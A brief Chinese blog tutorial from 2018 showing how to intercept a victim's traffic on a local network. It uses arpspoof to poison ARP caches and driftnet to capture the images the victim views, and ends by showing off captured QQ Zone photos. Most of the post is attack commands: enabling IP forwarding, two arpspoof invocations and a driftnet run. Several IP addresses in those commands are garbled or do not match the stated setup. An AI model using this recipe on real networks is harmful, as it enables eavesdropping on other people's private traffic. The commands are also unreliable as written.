arpspoof+driftnet+ ARP欺骗简单图片抓取

arpspoof+driftnet+ ARP欺骗简单图片抓取

driftnet是一款简单而使用的图片捕获工具,可以很方便的在网络数据包中抓取图片。该工具可以实时和离线捕获指定数据包中是图片
环境

受害ip:192.168.228.130
攻击ip:192.168.228.129
网关:192.168.228.2

条件

1,开启或关闭IP转发
2,向被攻击机器发送arp欺骗数据包,冒充网关
3,向网关发送arp数据欺骗网关,冒充被攻击机器
4,运行driftnet截取图片

开启IP转发功能

cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward

重定向受害者的流量传送给攻击者

arpspoof -t 192.168.130 168.168.228.2 -i eth0

使网关的数据重定向到攻击者的机器。(流量由网关到攻击者再到受攻击者)

arpspoof -t 168.168.228.2 192.168.228.129 -i eth0

监听

driftnet -i eth0


抓到的QQ空间图片-^^-

posted @ 2018-08-31 00:04  晓枫v5  阅读(6049)  评论(0编辑  收藏  举报